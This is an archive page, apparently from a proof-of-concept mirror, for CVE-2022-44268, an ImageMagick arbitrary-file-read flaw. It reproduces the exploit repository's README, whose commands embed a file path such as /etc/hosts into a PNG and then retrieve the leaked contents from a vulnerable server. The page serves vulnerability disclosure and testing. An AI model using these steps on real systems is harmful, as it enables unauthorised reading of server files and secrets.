Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-44268 PoC — ImageMagick 安全漏洞

Source
Associated Vulnerability
Title:ImageMagick 安全漏洞 (CVE-2022-44268)
Description:ImageMagick是美国ImageMagick公司的一套开源的图像处理软件。该软件可读取、转换或写入多种格式的图片。 ImageMagick 7.1.0-49版本存在安全漏洞,该漏洞源于存在信息泄露漏洞,当它在解析PNG图像时生成的图像可能会嵌入任意文件内容。
Description
CVE-2022-44268 ImageMagick Arbitrary File Read - Proof of Concept exploit
Readme
# CVE-2022-44268 🧙‍♂️

CVE-2022-44268 ImageMagick Arbitrary File Read - Proof of Concept exploit

### Video 📼
https://youtu.be/quKxwNAMBIA


## Usage 🛠 

Poison the image ☣️
```
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
```
```
Upload poisoned PNG image.
```
Check if exploit was successful 🗡
```
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
```

## Running from Docker :whale:

Build
```
docker build -t cve-2022-44268 .
```

Run
```
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
```

## Parameters 🧰 

Parameter | Description | Type
------------ | ------------- | -------------
--url | The URL of the uploaded PNG image | String
--image | Input PNG file | File
--output | Output PNG file | File
--file-to-read | File to read from vulnerable host | String


## Contact Me📇

[Twitter - Milan Jovic](https://twitter.com/milanshiftsec)

[LinkedIn - Milan Jovic](https://www.linkedin.com/in/milan-jovic-sec/)

#### Educational purposes only and cannot be used for law violation or personal gain.
#### The author of this project is not responsible for any possible harm caused by the materials of this project.
#### More details: https://www.metabaseq.com/imagemagick-zero-days/
File Snapshot

[4.0K] /data/pocs/30f2b74b0990b3b7ad572b9e8f63b40888988fda ├── [1.7K] CVE-2022-44268.py ├── [ 232] Dockerfile ├── [1.4K] README.md └── [ 47] requirements.txt 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.